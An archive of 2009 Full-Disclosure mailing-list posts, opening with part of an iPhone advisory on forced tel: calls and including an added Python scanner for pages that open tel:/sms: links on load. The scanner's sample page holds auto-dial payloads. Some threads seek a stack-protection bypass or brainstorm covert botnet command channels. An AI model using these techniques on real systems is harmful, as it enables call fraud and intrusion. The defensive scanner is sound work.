source of an iframe. This is shown in the first proof-of-concept
exploit below.
 
Further investigation showed that this behavior can be reproduced by
launching other applications such as: Maps, YouTube, and iTunes.
Launching these applications can be achieved through loading special
URLs using the meta refresh tag. This is shown in the second
proof-of-concept exploit below.
 
We also discovered that the bug can also be triggered through popup
windows (e.g. javascript alert). In this situation the initiating app
does not need to be terminated in order to activate the call.
 
Finally, we discovered a second bug that can be used to perform
malicious phone calls that cannot be prevented or canceled by the
victim. This bug allows the attacker to freeze the GUI (graphical user
interface) for a number of seconds. While the GUI is frozen the call
progresses in the background and cannot be stopped by the victim user.
Freezing the GUI is achieved by passing a very long phone number to
the SMS 
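
The advisory lists the contexts in which a tel: URI is opened without a click (frame/iframe source, meta refresh, HTTP 30X redirect location, script-set window location). As an added example, not part of the original advisory or of this thread, the following Python check flags those contexts in a captured HTTP response so a proxy or content review can spot pages that hand off to the dialer or SMS application on load. The names scan_response and AutoOpenFinder and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# URI schemes that hand control to another application (dialer, SMS).
HANDOFF_SCHEMES = ("tel:", "sms:")

# Script-driven navigation to a hand-off URI, e.g. window.location = "tel:...".
JS_NAV_RE = re.compile(
    r"""(?:location(?:\.href)?\s*=|location\.(?:assign|replace)\s*\(|window\.open\s*\()"""
    r"""\s*['"]((?:tel|sms):[^'"]*)['"]""",
    re.IGNORECASE,
)
# Target of <meta http-equiv="refresh" content="0; url=...">.
META_URL_RE = re.compile(r"""url\s*=\s*['"]?([^'";\s]+)""", re.IGNORECASE)


def is_handoff(uri):
    """True when the URI uses one of the hand-off schemes (case-insensitive)."""
    return uri.strip().lower().startswith(HANDOFF_SCHEMES)


class AutoOpenFinder(HTMLParser):
    """Collects hand-off URIs that load without a click; <a href> is ignored."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attr = {k: (v or "") for k, v in attrs}
        if tag in ("iframe", "frame") and is_handoff(attr.get("src", "")):
            self.findings.append((tag + " src", attr["src"].strip()))
        elif tag == "meta" and attr.get("http-equiv", "").lower() == "refresh":
            m = META_URL_RE.search(attr.get("content", ""))
            if m and is_handoff(m.group(1)):
                self.findings.append(("meta refresh", m.group(1)))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            for m in JS_NAV_RE.finditer(data):
                self.findings.append(("script navigation", m.group(1)))


def scan_response(status, headers, body):
    """Return (context, uri) pairs for every auto-opened hand-off URI."""
    findings = []
    if 300 <= status < 400:
        for name, value in headers.items():
            if name.lower() == "location" and is_handoff(value):
                findings.append(("redirect Location", value.strip()))
    finder = AutoOpenFinder()
    finder.feed(body)
    finder.close()
    return findings + finder.findings


# Constructed sample (not from the advisory): three auto-loading contexts
# plus one ordinary link, which needs a click and is therefore not reported.
SAMPLE_PAGE = """<html><head>
<meta http-equiv="refresh" content="0; url=tel:+15555550100">
</head><body>
<a href="tel:+15555550100">Call support</a>
<iframe src="TEL:+15555550100"></iframe>
<script>window.location = "tel:+15555550100";</script>
</body></html>"""

if __name__ == "__main__":
    for kind, uri in scan_response(200, {}, SAMPLE_PAGE):
        print(kind, uri)
```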

[Full-disclosure] vulnerability cause of suicide

2009-06-09 Thread James Matthews
Computer vulnerability cause of suicide
http://www.theregister.co.uk/2009/06/09/lxlabs_funder_death/

This is the first time I heard about something like this happening.

-- 
http://www.jewelerslounge.com

Re: [Full-disclosure] FFSpy, a firefox malware PoC

2009-05-26 Thread James Matthews
On the iPhone a new app came out called MobileSpy, designed
to secretly record all activity on the iPhone. OMG, the iPhone now has
spyware etc. No,
the user must 1. jailbreak his phone 2. download and install the MobileSpy
application.
Recently a person told me that stupidity is a capital crime. We see that
ever more here. These days we are worried about drive-by downloads. Spyware
in the form of Mozilla Firefox has been an issue for a while.

James

On Tue, May 26, 2009 at 9:28 AM, Shell Code technobus...@gmail.com wrote:

 On Wed, May 20, 2009 at 6:12 AM, saphex sap...@gmail.com wrote:
  I think this is interesting, http://myf00.net/?p=18
 
 

 I fail to understand what is new or interesting in this POC. If a
 person with malicious intent gains so much access to a system that he
 can put his files or firefox plugins, modify existing files, etc. then
 he can do anything he wants anyway. This is nothing new. It was well
 known always that Firefox plugins can also be made to do malicious
 things such as steal passwords, sniff data before it gets encrypted in
 SSL, etc. Absolutely nothing new.

 The same holds true for a user downloading malicious software on his
 own and running it on his system. It is true that most users don't
 verify the source code before running. But this is not anything
 specific to Firefox. This holds true for any open source or closed
 source software users download. So, again FFSpy sniffing data is
 nothing new.

 From the POC it seems that somehow the attacker has to gain physical
 access to the system or do some social engineering attack to fool the
 user in installing or modifying his existing plugins. The PoC does not
 explain how this is done. This is like claiming, I have found an
 interesting attack which involves modifying XYZ program or DLL or
 script on the system that would sniff data and send it to a remote
 server. I name it ComputerSPY. This is very lame. Of course if you
 have access to modify or create stuff in the system, you can do
 anything. Nothing new at all.

 What is the point of the POC? What is the PoC trying to achieve? Is
 the POC trying to tell us something that we already don't know?





-- 
http://www.goldwatches.com

http://www.jewelerslounge.com

[Full-disclosure] Who is destroying our internet?

2009-05-18 Thread James Matthews
Whenever a major service goes down, people speculate whether it was hacked or
not. This past week we saw Google go down, and now Avsim was killed
by hackers.
http://news.digitaltrends.com/news-article/19942/flight-sim-site-killed-by-hackers
While these two events are not related in any way, I am wondering why people
don't create backup off site or don't plan normal failsafes when their site
is as big as Google (we have seen a few popular sites die because of this
mistake).

James

-- 
http://www.jewelerslounge.com

Re: [Full-disclosure] Major Greek bank sites with SSL vulnerable to XSS and open redirects

2009-05-10 Thread James Matthews
Why are these banks still using ASP? It's insecure by default!

On Sun, May 10, 2009 at 8:46 PM, xssed secur...@xssed.com wrote:

 Hello there,

 This story may interest you:

 http://www.xssed.com/news/96/Major_Greek_bank_sites_with_SSL_vulnerable_to_XSS_and_open_redirects/

 Regards,
 XSSed Staff





-- 

http://www.astorandblack.com

Re: [Full-disclosure] Anand A has sent you a private message

2009-04-28 Thread James Matthews
I love you too!

On Tue, Apr 28, 2009 at 12:12 PM, Anand A nore...@ci.faniq.com wrote:

 [image: FanIQ] http://FanIQ.com/user/aanand01/connect/247743246
 Anand A has sent you a private message
 Click to read message: http://FanIQ.com/user/aanand01/conne%0A+ct/247743246
 [image: Read private message] http://FanIQ.com/user/aanand01/connect/247743246
 Please read it or Anand will think you ignored this :(
 This message has been forwarded at the request of aanan...@gmail.com. To
 block all emails from FanIQ, please click here:
 http://www.faniq.com/unsubscribe.php?invite_id=247743246stkn=6b58f88236c450eeb5d9cfe8c061fe4d
 FanIQ is located at 604 mission St, Suite 600, San Francisco, CA 94105, USA.






-- 

http://www.astorandblack.com

Re: [Full-disclosure] Kaminsky: MS security assessment tool is a 'game changer'

2009-03-23 Thread James Matthews
I want to get some hands-on with that tool.

On Mon, Mar 23, 2009 at 1:01 PM, Fionnbharr tho...@gmail.com wrote:

 Thanks for the link, would be terrible if I missed something Kaminsky said.

 2009/3/23 Ivan . ivan...@gmail.com:
  In case anyone missed it
 
  http://www.theregister.co.uk/2009/03/20/microsoft_crash_tool/
 




-- 

http://www.goldwatches.com/Watches.asp?Brand=71

Re: [Full-disclosure] Google to base ads on surfing behaviour

2009-03-17 Thread James Matthews
When they bought doubleclick I knew this would happen

On Tue, Mar 17, 2009 at 12:59 AM, Nick FitzGerald
n...@virus-l.demon.co.uk wrote:

 Bipin Gautam wrote:

  google is evil :
 http://news.zdnet.co.uk/internet/0,100097,39625962,00.htm

 That's news?  8-)

  These ads will associate categories of interest -- say sports,
  gardening, cars, pets -- with your browser, based on the types of sites
  you visit and the pages you view,
  ...
  As with any other cookie, this tracking file can be cleared by the
  user at any time. By visiting Google's ad-preferences page, the user
  can opt out of having their surfing habits tracked, or input their own
  preferences for the subject matter of ads they would like to see.
 
  However, as clearing the browser's cookies would effectively remove
  the opt-out cookie itself, Google has also released a plug-in for
  browsers that provides a permanent opt-out from the service.
  ...

 Whatever happened to default deny?

 Oh, that's right -- it wouldn't be in _Google's_ interest to require
 surfers to opt into Google breaching their privacy.

 As the US government doesn't seem to care much, if at all, about
 protecting the privacy rights of its citizens (in fact, do US citizens
 actually have any legally-protected privacy rights worth talking about?),
 perhaps the EU should step up here and fine the crap out of Google until
 it fixes this latest egregious assault on our privacy...

 ...

 And would it be churlish to point out that Google is breaking its own
 principles with this move?

 Bipin has already alluded to the much-vaunted do no evil doctrine
 (actually, it is You can make money without doing evil -- point six at:

   http://www.google.com/corporate/tenthings.html

 and arguably does not preclude but you can make more money by doing
 evil if you read the whole thing), but there are others, perhaps most
 pertinent here are in:

   http://www.google.com/corporate/software_principles.html

   Software Principles

   At Google, we put a lot of thought into improving your online
   experience.  We're alarmed by what we believe is a growing disregard
   for your rights as computer users. We've seen increasing reports of
   spyware and other applications that trick you in order to serve you
   pop-up ads, connect your modem to expensive toll numbers or hijack
   your browser from the site you're trying to visit.

 Yet it seems that it is acceptable for Google to breach reasonable
 expectations of privacy behind the scenes (these principles seem aimed
 at client-side, rather than server-side, shenanigans -- h...).

   We do not see this trend reversing itself. In fact, it is getting
   worse. As a provider of services and monetization for users,
   advertisers and publishers on the Internet, we feel a responsibility

 ...to ensure those trends continue?

 No -- actually, it continues:

   to be proactive about these issues. So, we have decided to take
   action. As a first step, we have outlined a set of principles we
   believe our industry should adopt and we're sharing them to foster
   discussion and help solve the problem. We intend to follow these
   guidelines ourselves with the applications we distribute (such as the
   Google Toolbar and Google Desktop). And because we strongly believe
   these principles are good for the industry and users worldwide, we
   will encourage our current and prospective business partners to adopt
   them as well.

 ...but again, we won't apply these principles to the service side of our
 industry and actions.

 How gloriously myopic, or is that two-faced?

 The second of these proposed software principles is described thus:

   UPFRONT DISCLOSURE

   When an application is installed or enabled, it should inform you of
   its principal and significant functions. And if the application makes
   money by showing you advertising, it should clearly and conspicuously
   explain this.  This information should be presented in a way that a
   typical user will see and understand -- not buried in small print that
   requires you to scroll. For example, if the application is paid for by
   serving pop-up ads or sending your personal data to a third party,
   that should be made clear to you.

 But, again, not if it's Google, DoubleClick, et al. twiddling bits on the
 back-end...

 And a few sections later:

   SNOOPING

   If an application collects or transmits your personal information such
   as your address, you should know. We believe you should be asked
   explicitly for your permission in a manner that is obvious and clearly
   states what information will be collected or transmitted. For more
   detail, it should be easy to find a privacy policy that discloses how
   the information will be used and whether it will be shared with third
   parties.

 But, again, not if it's Google, DoubleClick, et al. twiddling bits on the
 back-end...

 ...

 And to add another security-related issue to this thread, I'd rather that
 Google and 

Re: [Full-disclosure] The BBC acquired a botnet, but was it legal? - Update

2009-03-16 Thread James Matthews
No, it's not acceptable! But they seem to do whatever suits them!

On Mon, Mar 16, 2009 at 12:52 AM, Ivan . ivan...@gmail.com wrote:

 According to Struan Robertson, a technology lawyer with Pinsent
 Masons, in a posting on Out-Law.com, the BBC's statement that the
 activity would only be illegal if those behind it had criminal intent
 is not true. Robertson said The BBC appears to have broken the
 Computer Misuse Act by causing 22,000 computers to send spam. It does
 not matter that the emails were sent to the BBC's own accounts and
 criminal intent is not necessary to establish an offence of
 unauthorised access to a computer. However, Robertson does not think
 the BBC will be punished for the action because the BBC's actions
 probably caused no harm.


 http://www.h-online.com/security/The-BBC-acquired-a-botnet-but-was-it-legal-Update--/news/112834





-- 
http://www.astorandblack.com

Re: [Full-disclosure] BBC cybercrime probe backfires

2009-03-13 Thread James Matthews
I agree! Why can't other people hack into computers to show This is
such BS and the BBC should be hit hard by what they did.

On Fri, Mar 13, 2009 at 7:18 AM, Ivan . ivan...@gmail.com wrote:
 The BBC hacked into 22,000 computers as part of an investigation into
 cybercrime but the move quickly backfired, with legal experts claiming
 the broadcaster broke the law and security gurus saying the experiment
 went too far.


http://www.smh.com.au/news/technology/security/bbc-cybercrime-probe-backfires/2009/03/13/1236447465056.html





-- 
http://www.astorandblack.com/

Re: [Full-disclosure] Notice to all employees

2009-02-28 Thread James Matthews
I see it's a combo of an old one I saw.. Nice for the weekend.

On Sat, Feb 28, 2009 at 8:40 AM, Peter Besenbruch p...@lava.net wrote:

 On Friday 27 February 2009 16:42:27 Stephen Menard wrote:
   Original Message 
  Subject:  FW: Notice to all employees
  Date: Fri, 27 Feb 2009 15:42:20 -0300

  Due to the current financial situation caused by the slowdown of the
  economy, Management has decided to
  implement a scheme to put workers of 40 years of age and above on early
  retirement. This scheme will be known
  as RAPE (Retire Aged People Early).

 It's cute. Checking the Web, this one has been making the rounds for about
 a month. Very cute.
 --
 Hawaiian Astronomical Society: http://www.hawastsoc.org
 HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Windows 7 or KDE4?

2009-02-27 Thread James Matthews
Ha, what happens when people see that they have to use wine to launch
windows exe's?

On Fri, Feb 27, 2009 at 10:49 AM, yersinia yersinia.spi...@gmail.com wrote:

 Wonderful.


 On Fri, Feb 27, 2009 at 1:49 AM, Ivan . ivan...@gmail.com wrote:

 http://olylug.org/read.php?73,13757





-- 
http://www.astorandblack.com

Re: [Full-disclosure] Weird traffic

2009-02-27 Thread James Matthews
Welcome to FD; sometimes there is some fear mongering.

On Fri, Feb 27, 2009 at 1:04 AM, julio sanchez pete.sanc...@gmail.com wrote:

 No virus in there, it's a normal cap file...


 2009/2/26 srl security.research.l...@gmail.com

 Don't open the pcap file in wireshark! It is exploiting a hole in
 wireshark, you will be pwned!!!

 On Wed, Feb 25, 2009 at 9:56 PM, julio sanchez pete.sanc...@gmail.com wrote:

 Here's the cap file
 10.240 is the A-V server.
 You can see various ARP loop scan


 Regards Pete






-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Weird traffic

2009-02-25 Thread James Matthews
If you have a large paste can you please put it in a pastebin.

On Wed, Feb 25, 2009 at 7:50 PM, julio sanchez pete.sanc...@gmail.com wrote:

 No IDS alert yet.
 What alerted us was the constant ARP loop scan on various Vista SP1 boxes
 while we were monitoring the network.
 I'll send a pcap in one hour or two.
 Thanks
 2009/2/25 B Null bn...@offenseindepth.com

 Can you provide a pcap with the suspect traffic isolated?  Also, what
 alerted you to the odd behavior?  Did the traffic flag an IDS alert?

 bNull

 On Wed, Feb 25, 2009 at 9:27 AM, julio sanchez pete.sanc...@gmail.com wrote:

 Hi,

 We're experiencing some weird ARP traffic on our network: some boxes
 constantly scan the subnets with looping who-has requests.
 The boxes are all Windows Vista SP1, fully patched.
 We formatted all the suspect boxes and isolated them on a VLAN to
 reinstall Vista, updates and Kaspersky, then put them back on the network, and
 still some random freshly formatted boxes are scanning the network.
 We found out that Vista will do an ARP scan when it searches for a network
 printer, but it does this once.
 The problem we have is an almost permanent ARP scan on various boxes.
 We know that some worm was hitting some networks around the world with the
 SMB vulnerability, but all of our boxes are fully updated.
 Have you experienced something like this before, or does it seem to be legit
 traffic?
 Can this be a worm or something related?

 Thanks in advance

 Pete





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Oh Yeah, botnet communications

2009-02-23 Thread James Matthews
I would use something like UDP or IGMP and modify the packets slightly. I
know that most routers will just pass them on and not worry about a few
weird things.

On Mon, Feb 23, 2009 at 2:56 PM, John C. A. Bambenek, GCIH, CISSP 
bambenek.info...@gmail.com wrote:

 Yes, it's possible, I mapped out something on a high level that would
 use rss/xml and would evade most detection methods on the network...
 Problem comes in is that stuff gets detected at infection-time and
 gets reverse engineered. Stealthy botnets is easy, stealthy infection
 is trickier.

 On 2/19/09, T Biehn tbi...@gmail.com wrote:
  God Valdis,
  Don't concentrate on the mundane, the core issue is the unpredictable nature
  of it.
  You have them all coordinate reading the news at 12:00 AM GMT.
  You build some silly algorithm that ensures they pick the right article.
 
  -Travis
 
  On Thu, Feb 19, 2009 at 11:34 PM, valdis.kletni...@vt.edu wrote:
 
  On Thu, 19 Feb 2009 23:13:38 EST, T Biehn said:
 
   You know how the current amateur botnet offerings are basing domain lists
   off the current time to allow the 'good guys' to prepare?
  
   Why not base the seed off something like a news RSS feed? I asked some
   whitehats when I was ruined in Washington DC and they couldn't tell me.
 
  If you're the botnet owner, you need to have some way to know what domain
  name your botnet will be looking for, so you can register it.
 
  If you look at 11:06AM, see the top news story is something about Obama
  flipping the Republican party the bird, and computes the domain name to
  register based on that, but then at 11:07AM some editor at CNN pulls that
  headline and replaces it with Obama sends obscene gesture to Republicans
  before your bots wake up at 11:08AM and check what domain to use, you're
  screwed.
 
 
 
 

 --
 Sent from my mobile device





-- 
http://www.astorandblack.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] ICQ 6 protocol bug?

2009-02-14 Thread James Matthews
ICQ is known to have a few remote bugs. I use meebo.com instead of a client
due to these issues.

On Fri, Feb 13, 2009 at 5:57 PM, Leon Juranic leon.jura...@infigo.hr wrote:


 Hi,

 It could be quite possible, although, I can't confirm it. But, after
 analysis of recent ICQ6 vulnerability, I'm under impression that there are
 more similar vulnerabilities in it.

 ICQ6 vulnerability:
 http://www.infigo.hr/hr/in_focus/advisories/INFIGO-2008-04-08


 Regards,
 Leon Juranic

 -Original Message-
 From: full-disclosure-boun...@lists.grok.org.uk
 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Darren
 Reed
 Sent: Friday, February 13, 2009 10:01 AM
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] ICQ 6 protocol bug?

 For some time now I've seen ICQ receive messages, from unknown people,
 occasionally make the client 'core dump'. The messages are often
 gibberish - more like the ASCII characters from someone trying to make
 it execute something it shouldn't.

 My interpretation of this is unknown parties are trying to exploit a bug
 in ICQ6 (it may work on Win2k or Win98...) but I might be wrong. I need
 to fire up wireshark to see what actually get sent.

 Has anyone else seen this?
 Or have details on what the hack is?

 Google found some hits for old bugs, older than ICQ6

 Darren
 --
  Darren Reed
  darr...@reed.wattle.id.au





-- 
http://www.astorandblack.com

Re: [Full-disclosure] Exploiting buffer overflows via protected GCC

2009-02-14 Thread James Matthews
I would recommend doing the following things.

1. Ask on the Ubuntu GCC list what protection is implemented. (Or just look
at the source)
2. Use GCC to see where the execution is being redirected and so you can
have a better visual of what's going on.
3. Are you sure the stack is executable?



On Sat, Feb 14, 2009 at 12:30 AM, Marcus Meissner meiss...@suse.de wrote:

 On Fri, Feb 13, 2009 at 11:50:11AM -0500, Jason Starks wrote:
  I came across a problem that I am sure many security researchers have
 seen
  before:
 
  ja...@uboo:~$ cat bof.c
  #include <stdio.h>
  #include <string.h>
 
  int main()
  {
 
  char buf[512];
 
  memset(buf, 'A', 528);
 
  return 0;
 
  }
  ja...@uboo:~$
 
  ja...@uboo:~$ ./bof
  *** stack smashing detected ***: ./bof terminated
  === Backtrace: =
  /lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f08548]
  ja...@uboo:~$
 
  I have googled my brains out for a solution, but all I have gathered is that
  my Ubuntu's gcc is compiled with SSP and every time I try to overwrite the
  return address it also overwrites the canary's value, and triggers a stop in
  the program. I've disassembled it and anybody who can help me probably
  doesn't need me to explain much more, but I would like to know a way to get
  this. There seems to be some people on this list who may know something on
  how to exploit on *nix systems with this protection enabled.
 
  I do not want to just disable the protection and exploit it normally, I want

 Perhaps you should learn first exactly _what_ caught your buffer overflow.

 Hint: It was not SSP aka -fstack-protector.

 Ciao, Marcus





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/
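
The thread above turns on telling apart the overflow checks a distribution's GCC enables by default. As an added example (not code from the thread), this C sketch shows the object-size style of check that _FORTIFY_SOURCE applies to calls such as memset, which runs before the write, whereas the -fstack-protector canary is only verified when the function returns. checked_memset_impl, CHECKED_MEMSET and the fill_* functions are hypothetical names, and GCC or Clang is assumed for __builtin_object_size.

```c
/* Added illustration, not code from the thread. All names are hypothetical. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

enum fill_status {
    FILL_OK = 0,        /* size known, write fits, write performed */
    FILL_REFUSED = -1,  /* size known, write too large, nothing written */
    FILL_UNCHECKED = 1  /* size unknown at compile time, write performed blind */
};

/*
 * Object-size check in the style of the fortified libc wrappers: compare the
 * requested length with the destination size the compiler reported *before*
 * touching memory. glibc's fortified calls abort the process at this point;
 * this sketch returns a status instead so the outcome can be inspected.
 */
static enum fill_status checked_memset_impl(void *dst, int c, size_t n,
                                            size_t dst_size)
{
    if (dst_size == (size_t)-1) {   /* compiler could not determine the size */
        memset(dst, c, n);
        return FILL_UNCHECKED;
    }
    if (n > dst_size)
        return FILL_REFUSED;
    memset(dst, c, n);
    return FILL_OK;
}

/*
 * __builtin_object_size has to see the destination expression at the call
 * site, so the wrapper is a macro (GCC and Clang builtin).
 */
#define CHECKED_MEMSET(dst, c, n) \
    checked_memset_impl((dst), (c), (n), __builtin_object_size((dst), 0))

/* Same shape as bof.c in the thread: a 512-byte stack buffer, caller picks n. */
enum fill_status fill_local_buffer(size_t n)
{
    char buf[512];
    return CHECKED_MEMSET(buf, 'A', n);
}

/*
 * Limitation: through a plain pointer parameter the compiler does not know
 * how large the destination is, so this kind of check cannot fire. The
 * canary check at function return does not depend on that knowledge.
 */
__attribute__((noinline))
enum fill_status fill_through_pointer(char *p, size_t n)
{
    return CHECKED_MEMSET(p, 'A', n);
}

enum fill_status fill_via_pointer_demo(void)
{
    char buf[512];
    return fill_through_pointer(buf, 16);  /* 16 fits; only the status matters */
}

int main(void)
{
    printf("512 bytes into buf[512]: %d\n", fill_local_buffer(512));
    printf("528 bytes into buf[512]: %d\n", fill_local_buffer(528));
    printf("16 bytes via char *:     %d\n", fill_via_pointer_demo());
    return 0;
}
```
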

[Full-disclosure] Windows 7 UAC compromised

2009-02-02 Thread James Matthews
http://www.istartedsomething.com/20090130/uac-security-flaw-windows-7-beta-proof/

Windows is like Swiss cheese!

-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] Closure of political threads

2009-01-19 Thread James Matthews
I second. This is a security mailing list and should stick to topic.

On Mon, Jan 19, 2009 at 7:31 PM, andrew. wallace 
andrew.wall...@rocketmail.com wrote:

 I'm calling for the closure of political threads on full-disclosure so
 we can get back to business.

 Andrew





-- 
http://www.astorandblack.com

Re: [Full-disclosure] The war in Palestine

2009-01-18 Thread James Matthews
Now that the conflict is over can we get back to security?

On Sun, Jan 18, 2009 at 9:16 AM, Avraham Schneider avri.schnei...@gmail.com
 wrote:

 s/neiboring/neighboring/g


 On Sun, Jan 18, 2009 at 9:09 AM, Avraham Schneider 
 avri.schnei...@gmail.com wrote:



 On Sun, Jan 18, 2009 at 8:18 AM, j-f sentier j.sent...@gmail.com wrote:

 You can go to the Kneset website and find out.
 Oh so there's a website dedicated to the one who didn't get corrupted?
 Oh come on, you know what I'm talking about your country is driven
 by that.

 There is corruption everywhere - you think there is no corruption in any of
 the surrounding Arab countries?
 Israel has a legal system and when one is found corrupt, he pays his time
 - even if he was a minister, or a president.
 This is something that can only happen in a democracy - something the
 neiboring arab countries should adopt.




 Oh Oh Oh, you don't like to play the propaganda game with me?
 No I don't.

 I understand that :)

 Die slowly with lots of pain.

 I plan to live on for many more years... If you have a problem with that,
 you can try and change that but I don't think that would be good for your
 health...






  2009/1/18 Avraham Schneider avri.schnei...@gmail.com



 On Sun, Jan 18, 2009 at 8:01 AM, j-f sentier j.sent...@gmail.com wrote:

 haha, how much time this took you to say that?
 You're paid to make propaganda on FD this more than clear.
 you don't answer on any real questions

 You obviously ignore everything I write


 , you say always the same stuff

 No - I answer your questions, and I correct false claims made by you.


 , aka yeah but hamas was elected by palestinian so palestinian should
 die

 When did I say that?


 , but know what , not talking about war anymore here,

 Great!


 just your politician.
 Give me just one name of an Israeli president or first minister who
 didn't end up his mandate with corruption charges.

 You can go to the Kneset website and find out.



 and what you still promoting them?

 Not promoting any of them - just responding to your false claims and
 propaganda.



 Oh Oh Oh, you don't like to play the propaganda game with me?

 No I don't.







 2009/1/18 Avraham Schneider avri.schnei...@gmail.com

 I guess I can't prove that I don't, so what can I say...

 Do you have anything you find incorrect in what I have responded to
 you, or you are done with your nonsense and the list can go back to being a
 Computer Security Mailing List?

 On Sun, Jan 18, 2009 at 7:32 AM, j-f sentier j.sent...@gmail.com wrote:

  You are paid to say that Avraham, and it's a shame.

 2009/1/18 Avraham Schneider avri.schnei...@gmail.com



 On Sun, Jan 18, 2009 at 2:00 AM, andrew. wallace 
 andrew.wall...@rocketmail.com wrote:

 On Sat, Jan 17, 2009 at 11:48 PM, Avraham Schneider
 avri.schnei...@gmail.com wrote:
  they don't have the time to find out if it is a UN building

 I find that hard to believe with the amount of intelligence the
 Israelis have.

 During war, when you are fired at, you shoot back without asking
 questions.




 On Sat, Jan 17, 2009 at 11:48 PM, Avraham Schneider
 avri.schnei...@gmail.com wrote:
  and/or if there are civilians inside or not.

 Of course there are civilians inside, it's a UN building.

 Then they should make sure that no terrorists fire at IDF soldiers
 from there.
















-- 
http://www.astorandblack.com/

Re: [Full-disclosure] BBC makes no reference to Cyber War only Cyber Protest

2009-01-18 Thread James Matthews
We know BBC loves to twist things. They will use different euphemisms to
tune things in their own way.

On Fri, Jan 16, 2009 at 12:55 AM, Yudi Rosen yr42.li...@gmail.com wrote:

 Does it really matter what it's called?

 What would you call that little incident in Estonia a couple years back?
 Would you call that war or protest?

 And even with the current Israeli/Palestinian hacking 'skirmish'...why is
 that just a 'protest' and not a war?

 Sure, BBC might call it a 'protest', but two sides fighting with each
 other, trying to defend their own systems yet at the same time attacking
 those of the other side...sounds a lot like war to me.


 On Thu, Jan 15, 2009 at 9:17 PM, andrew. wallace 
 andrew.wall...@rocketmail.com wrote:

 On Thu, Jan 15, 2009 at 5:44 PM, Yudi Rosen yr42.li...@gmail.com wrote:
  What's your point?

 The threat is Cyber Protest, not Cyber War, that's my point.

 about 18 hours ago from web

 The current threat to Information Security is 'Cyber Protest' not
 'Cyber War' during the Israel-Gaza crisis.

 https://twitter.com/n3td3v/status/1119897172







-- 
http://www.astorandblack.com/

Re: [Full-disclosure] Anybody having a mobile phone (Iphone, Nokia.) willing to test ?

2009-01-18 Thread James Matthews
Post it here and then see who reads FD with their iPhone.

On Fri, Jan 16, 2009 at 12:40 AM, Ivan . ivan...@gmail.com wrote:

 yeah I do


 On Fri, Jan 16, 2009 at 3:12 AM, Thierry Zoller thie...@zoller.lu wrote:


 Hi,

 Anybody that has an Phone with a browser, Opera Mini, G1, Iphone willing to
 test a POC please contact me.


 --
 http://secdev.zoller.lu
 Thierry Zoller








-- 
http://www.astorandblack.com/

Re: [Full-disclosure] spam from NASA

2009-01-12 Thread James Matthews
It seems that the US Gov loves to keep its computers secure and prosicit

On Mon, Jan 12, 2009 at 4:33 PM, Juha-Matti Laurio 
juha-matti.lau...@netti.fi wrote:

 Some of us remember Support Intelligence's research in April 2007:

 http://blog.support-intelligence.com/2007_04_01_support-intelligence_archive.html

 (covered at 'Corporate spambots named and shamed'
 http://www.vnunet.com/vnunet/news/2188948/corporate-spambots-named-shamed)

 Juha-Matti

 Tonu Samuel [t...@jes.ee] wrote:
  Looks this mail went to devnull:
 
  --8--
 
  Just interesting spam I got today. It was from and actually
  originating from NASA. Yet visible here if someone cares:
 
 
 
 http://www.spamcop.net/sc?id=z2486413060z414e4d86a6a209ebc1682975316af239z
 
Tõnu
 





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] It's time for me to go now

2009-01-11 Thread James Matthews
Goodbye... You will be missed by many

On Mon, Jan 12, 2009 at 9:00 AM, quispiam lepidus 
quispiam.lepi...@gmail.com wrote:

 You are, the weakest link. Goodbye.

 On Mon, Jan 12, 2009 at 12:45 PM, n3td3v xploita...@gmail.com wrote:
  I don't know how to hack and I don't have any technical abilities I
  must go now before MI5 take me away in a van and dump my body in the
  sea.
 
 





-- 
http://www.astorandblack.com/

Re: [Full-disclosure] ImmunitySec is an NSA front.

2009-01-08 Thread James Matthews
Well it's now an Israeli Plot.

On Thu, Jan 8, 2009 at 9:52 PM, ChromeSilver chromesil...@exec-labs.com wrote:


 Dear Prof. Chatner,

 I don't know what you mean, on GoogleEarth it's 3D-Building.

 Cheers,
 ChromeSilver

 If light be the brightest light...
 Wherfore then doth it shadows cast?
 - -R.Rohonyi

 Professor Micheal Chatner wrote:
  I have recently witnessed a conspiracy by ImmunitySEC headed by the
  Israeli spy David Aitel.
 
 
 http://maps.google.com/maps?q=IMMUNITYSEC,+miami,+floe=utf-8client=firefox-aie=UTF8ll=25.783508,-80.140972spn=0,359.818039z=13iwloc=Alayer=ccbll=25.783635,-80.140995panoid=RuVREzzTYFjcmaegYtzhRgcbp=12,441.86166752012093,,0,5
 
  As you can see their entire road is BLURRED OUT. This is obviously a
  tactic to keep out the Chinese spies that they time and time again
  sell 0day to.
 
  It is too complicated to explain now but I will have more research later.
 
  Professor Micheal Chatner, M.D. CISSP
 
 
 





-- 
http://www.goldwatches.com/

http://www.jewelerslounge.com/

Re: [Full-disclosure] The (net)war in Palestine

2009-01-06 Thread James Matthews
This article shows the issue within Syria. People are so scared of the
Gov... That they think it puts them through tests etc...

On Mon, Jan 5, 2009 at 12:18 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:

 --On January 4, 2009 10:27:19 AM -0600 Fabio Pietrosanti (naif)
 li...@infosecurity.ch wrote:

 
  Arturo 'Buanzo' Busleiman wrote:
  Yeah, take all this crap out of a full-disclosure, IT security
  mailing list, please...
  To keep the discussion on topic, what do you think about the Israel
  ability to professionally arrange national-wide SMS spamming to border
  countries?
 
  http://fergdawg.blogspot.com/2008/12/israeli-telephone-commandos-strike.html
 

 Interesting.  At the bottom of Paul's post there is a note.

 Note: There are no verifiable external resources listed to support this
 claim. -ferg

 IOW, this may or may not be true.

 Paul Schmehl, If it isn't already
